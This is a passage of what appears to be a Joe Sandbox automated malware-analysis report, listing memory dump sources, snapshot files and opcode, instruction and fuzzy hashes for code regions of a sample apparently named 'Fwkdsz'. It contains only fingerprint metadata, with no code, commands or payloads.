                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e16090a9447d1fc853d9ba54191823680f40fd3bc8f667bda8e40ba6db72ae2a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9B414974B001149FCB44EF69D498AADBBF2AF9C710B2484A9E806EB3A5CF709C45CB51
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706800945.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74b0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: !
                                                                                                                                                                                                                                                • API String ID: 0-2657877971
                                                                                                                                                                                                                                                • Opcode ID: edfbf471a7ef5c3642622a734b33d080c14e4b9ceeb47fa18439ad1e5817207c
                                                                                                                                                                                                                                                • Instruction ID: 1554fb01ce8354640111c227e8f2893671c108038c5735f8c0d87c3e967fc564
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: edfbf471a7ef5c3642622a734b33d080c14e4b9ceeb47fa18439ad1e5817207c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 314122B091422ACFDB70DF28D994BEABBB2BB49301F1040EAC909A7254D7714EC4CF54
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706800945.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74b0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: M^|
                                                                                                                                                                                                                                                • API String ID: 0-1570543197
                                                                                                                                                                                                                                                • Opcode ID: 45f0bbeb5414738ed68e4fdd5598ec959701106e69b1209b4f04b6fbc2bc7d3e
                                                                                                                                                                                                                                                • Instruction ID: b2338bcdbe5fef3431215281c72d91c2f7f7db615b2d7dfad080fed1dfecd906
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 45f0bbeb5414738ed68e4fdd5598ec959701106e69b1209b4f04b6fbc2bc7d3e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FE413870A111188FDB94EF28D899BAAB7B2FF89300F1041E9D64AD7359DB319D85CF80
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706800945.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74b0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: ?
                                                                                                                                                                                                                                                • API String ID: 0-1684325040
                                                                                                                                                                                                                                                • Opcode ID: 98dbe8b4eba03cc766a2c33a90439d4e30497dbc29ea2e8612225f21e55e8b07
                                                                                                                                                                                                                                                • Instruction ID: c2ce076d8e7299b6566c02a80a8748c067dc5910670ae47210eca5e677ada334
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 98dbe8b4eba03cc766a2c33a90439d4e30497dbc29ea2e8612225f21e55e8b07
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 06E0A57480621ACEEB34CF11D948BE9BAF0AB01344F1094A6C409A3291D3354E86CF50
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706800945.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74b0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 8
                                                                                                                                                                                                                                                • API String ID: 0-4194326291
                                                                                                                                                                                                                                                • Opcode ID: 1171e749415a6d5b1c0e5f7fdc87cd3874fc4214e19461f0a7e67e71d7aa39cc
                                                                                                                                                                                                                                                • Instruction ID: 819208f23f97069afe969c47345aa9a9db0e2f43fa19731d6ea68925511663dd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1171e749415a6d5b1c0e5f7fdc87cd3874fc4214e19461f0a7e67e71d7aa39cc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C0E09278905229CFDB60CF20CA84BD9FBF1AB45304F1485EA8409A7291DB359F86DF40
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2639786281.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_2b20000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 4c9f112f72edaad5aa17b0c2a03f875b57e770de4cf9a08cc2bc6c66f7c6df7c
                                                                                                                                                                                                                                                • Instruction ID: cb84e1ee17a35ba0aa03b1ebbdac324d4b67e33c6652aae9f67ff7a81960fb24
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4c9f112f72edaad5aa17b0c2a03f875b57e770de4cf9a08cc2bc6c66f7c6df7c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF3138B09072199FEB00EFA9C4487AEBBF2FF45304F1491AAD10AE7255D7744A49CB61
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706800945.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74b0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: a1d39238efaed82a732dd03ea17433ada181577dec76208bf2dae4376066c85a
                                                                                                                                                                                                                                                • Instruction ID: 06dc144699a96fc7892e20e34248a66ac6d4be4aaf22b26f147db58b12a42bc9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a1d39238efaed82a732dd03ea17433ada181577dec76208bf2dae4376066c85a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BFA1E2B4A15218CFDB64DF6AD880BEEBBB2FB49300F1091AAD509A7349DB705D85CF50
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2639786281.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_2b20000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 27dd5f03c0c0678f35d0c04177936d201302cb2bb339a5319249f6204a157f49
                                                                                                                                                                                                                                                • Instruction ID: de3072a8d921ed1ed5500846a0cac0ab8183b1636aebd709d8b7f3c1e9c19e2d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 27dd5f03c0c0678f35d0c04177936d201302cb2bb339a5319249f6204a157f49
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A9810A75A00628CFCB14DF68C5849ADB7F5FF88314B2585A9E90A9B770DB30ED46CB90
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706800945.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74b0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 34f967046b184e48f230e150a5ce27aff04fcbc59cab4401af5be36b73b9780a
                                                                                                                                                                                                                                                • Instruction ID: b7d0fccb8c9deb069341e0370623dc9499ce9f86d00a016c549e947a6da7ace6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34f967046b184e48f230e150a5ce27aff04fcbc59cab4401af5be36b73b9780a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F09126B4905258CFDB60DFA9C844BEEBBB6FB4A300F00906AD509A7355D7385D46CF64
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706800945.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74b0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 6e0947f779faa05fb7b46beaa25bbe8bc67f1e23344b55f6b60c935c6b974552
                                                                                                                                                                                                                                                • Instruction ID: 95c6a9532f155348edc1c1712a7ee53b1886efa757b312e901cb410590edb14f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e0947f779faa05fb7b46beaa25bbe8bc67f1e23344b55f6b60c935c6b974552
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3A8112B0D05208CFDB24DFA9E994BEEBBF2BB49300F10916AD519A7294DB741D46CF50
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706800945.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74b0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 61c7207f62c2b3f14cbc0972ac53ff5f1c2c275f0dd221ad20f8bad50161e51f
                                                                                                                                                                                                                                                • Instruction ID: 73b2e052eb60b441c0772dc8a4ec28c659a2382c71bfcd1b44801e4816035c53
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 61c7207f62c2b3f14cbc0972ac53ff5f1c2c275f0dd221ad20f8bad50161e51f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA8101B0D0420CCFDB24DFA9E994BEEBBF6BB49300F10912AD519A7294DB741D46CB50
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706800945.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74b0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 223f284a00ae4c2269fe4b7da32c4d7b9b61cdb315a7f30f581205ecf3acd789
                                                                                                                                                                                                                                                • Instruction ID: 104e6fc419d4cc4667d1d93d1e5900fa34330fba6754e40c58b12e652e75c920
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 223f284a00ae4c2269fe4b7da32c4d7b9b61cdb315a7f30f581205ecf3acd789
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2DA1C3B4A11218CFDBA4EF69D894BADBBB2FB89304F1081A9D509E3355DB315D82CF50
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706800945.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74b0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 7e8f525f3cf2579dafbf238e3cee679f69cdeadb4716b7ecd30d4f1e6aac08d5
                                                                                                                                                                                                                                                • Instruction ID: 914e13c33388aef59f4a68be6214d95567cbbf3a618488ea37faf3a689e90221
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7e8f525f3cf2579dafbf238e3cee679f69cdeadb4716b7ecd30d4f1e6aac08d5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BE8102B0D0421CCFDB24DFA9E994BEDBBF2BB4A300F10916AD519A7254DB346D42CB10
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706800945.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74b0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 0b993cc2f6b3357fb08715bf19497eab8c4bdff908554c9b4654cb4f8614e033
                                                                                                                                                                                                                                                • Instruction ID: 4b9a8462db78a06e3c3e71c5ee25f9073523475f88f35236876826ca0763eebe
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b993cc2f6b3357fb08715bf19497eab8c4bdff908554c9b4654cb4f8614e033
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 917169B0A1111ACFDB60DF28C994BEEB7B2BB89305F0084EAD50AB7254DB715D85CF50
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706800945.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74b0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: f284b0340f1118ae66b2e2b61e8a5a5cb9949ca70e215027375c3a1bed79b339
                                                                                                                                                                                                                                                • Instruction ID: b244dce3af4961d605dc32b1fa0413f4b4cae5ec18473ad4247b6b12129abb51
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f284b0340f1118ae66b2e2b61e8a5a5cb9949ca70e215027375c3a1bed79b339
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5F4117B0D14228CFDB64DF26D854BEEB7B2BB89301F1081EAC849A7265DB715E81CF50
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2639786281.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_2b20000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: dcf9602058970c3e759cdf03ae4abbcdaa2a550c0f5f5b7ab6e9f29c2a87d687
                                                                                                                                                                                                                                                • Instruction ID: cce062a85f02b9093b04bff72f575879ee6da777437c8a927a88cab5b56eca13
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dcf9602058970c3e759cdf03ae4abbcdaa2a550c0f5f5b7ab6e9f29c2a87d687
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0A3179B0D00359AFCB14CFA9D584ADEBFF1EF88310F248069E519AB250DB349946CF90
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706800945.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74b0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: ffb8c9f3d3aa82f7752ccef5c69b0795658a0ddf30797b466bb4a3e52dbf7329
                                                                                                                                                                                                                                                • Instruction ID: 56d106bf5b91fa20ff5c7aea40d75fa860bc6be3abfbe52d3c52023a2632306c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ffb8c9f3d3aa82f7752ccef5c69b0795658a0ddf30797b466bb4a3e52dbf7329
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3141E5B0902219CFEB60CF19C984BE9B7F5BB49304F1584EAD509A7290D7759E85CF11
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2639786281.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_2b20000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 5b94bad3aa94c5a0c9ecfa8d814badb68afca474bdd957bf35975a4b5e168fbc
                                                                                                                                                                                                                                                • Instruction ID: 59d3f5fa59773f0aad53aa9c524bd3cb666ba0c9c8cf081209633c26795927a8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5b94bad3aa94c5a0c9ecfa8d814badb68afca474bdd957bf35975a4b5e168fbc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4A316870D00619DFCB00CFAAC8546AEBBF1FF89300F2084A6D919E7225D7349A48CF51
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2639786281.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_2b20000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 7fc26c24fb943157957c4bdc1a8d3b0c5821ef2b27b74a07021d048386c5650b
                                                                                                                                                                                                                                                • Instruction ID: df3b55c349b151fc2e013988890b8da483dfbf0a33dc68d0c9d9800d5b5adc1e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7fc26c24fb943157957c4bdc1a8d3b0c5821ef2b27b74a07021d048386c5650b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AB3137B0D00358AFDB14CFAAC584ADEBFF5EF48310F248069E919AB250DB759945CF90
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706800945.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74b0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 9153c91e5a8a68ca7c320843cd092bb28a82f73e87077a0158bb643097d4bd90
                                                                                                                                                                                                                                                • Instruction ID: 79e3e87d6fe0563848cb4cd73c20e3b607705c20f698c305a9a774f9174f5942
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9153c91e5a8a68ca7c320843cd092bb28a82f73e87077a0158bb643097d4bd90
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B741F4B0911228CFDBA4EF28D854BEEBBB2BB49301F1041EAC94DA7295D7715E81CF40
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2639786281.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_2b20000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 73655c253ea30831731e5a4c0ca7c985fa5f0808884751daa76c933c61d61acc
                                                                                                                                                                                                                                                • Instruction ID: ed2820ea3972b0a7058b85166df27398c3e5d14ed289258c8c7dd9270c15f113
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 73655c253ea30831731e5a4c0ca7c985fa5f0808884751daa76c933c61d61acc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FB31F4B4D00619DFDB04DFAAD4446AEBBF5FF89301F2084A6D919E7224E7749A48CF50
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2639786281.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_2b20000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 5c435c977fcb3bfbfa390b63bc3fe9764bfb2d138e4fbad79bcb537aa0400560
                                                                                                                                                                                                                                                • Instruction ID: 058faeb63aafecff0de66589a6c2fabc708cb232cb2f47e8d15369542ee28b0e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5c435c977fcb3bfbfa390b63bc3fe9764bfb2d138e4fbad79bcb537aa0400560
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 803148B0D06219DFEB40EFA9C0487AEBBF2FF49304F1091A9D50AE7645D7744A88CB21
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2639786281.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_2b20000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 6c1a1f7dbca7966d65753186a9980a4799aa662fef00a424b8326e9c2b4ce329
                                                                                                                                                                                                                                                • Instruction ID: 70cae0fe611cfe3ae339919463248985af7a3c9af7a95b7dd7de2aa84777f0df
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6c1a1f7dbca7966d65753186a9980a4799aa662fef00a424b8326e9c2b4ce329
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F2115B4E042198FEB04DFAAC4443EEBBF6FB89300F01956AD519A3294DB744909CF91
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2638821537.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_129d000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: fc3058e399f0b1070b515831107561f2a8da61681524f207d317f75526316ba8
                                                                                                                                                                                                                                                • Instruction ID: a53bbd33bb833a4f06d751afd80351b30efaaef939e470a6555bdb75c1c22dfc
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fc3058e399f0b1070b515831107561f2a8da61681524f207d317f75526316ba8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 96214571514208DFCF11DF5CD9C4B26BFA5FB84360F20C569E90A0B242C336D40AD7A2
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706800945.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74b0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: ef87fef39d398aea9217f3b768d4aa67ad162b11fdd292dee4b5b13ffd3dfa79
                                                                                                                                                                                                                                                • Instruction ID: 76ba08bd890a8d656516b75a5e34c60758b9a7a44bc210f62dc51290b87aacc5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ef87fef39d398aea9217f3b768d4aa67ad162b11fdd292dee4b5b13ffd3dfa79
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9131E2B4D15248CFEB14DF9AD0487EDBBF6EB4A304F10902AD915AB299D7359C4ACF10
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706800945.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74b0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 74d4a2bd7acf164b4052fb768c325aa437a4f5755572a26267e3186a5aca0723
                                                                                                                                                                                                                                                • Instruction ID: cad493447083cf1762c9801514ddb37d832a0d42f6527a3e5447dc180e574731
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 74d4a2bd7acf164b4052fb768c325aa437a4f5755572a26267e3186a5aca0723
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B52146B4905209DFDB10DFAAD8487EEBBF5FB4A304F10446AD500A7395C73859458F62
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706800945.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74b0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 3b477e9e448a9e27df523cc3d7100326b4cd45ba27b48eeb522bf50d0c549ee5
                                                                                                                                                                                                                                                • Instruction ID: 7c58b5a25fd5f761e634f1de0f2608b7817e342796bc79de20ed99b8b675abff
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3b477e9e448a9e27df523cc3d7100326b4cd45ba27b48eeb522bf50d0c549ee5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B231D4B4904268DFCBA4DF24D890BEEBBB1BB49301F1041EAC949A7255DBB15EC0CF94
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2706800945.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_74b0000_Fwkdsz.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
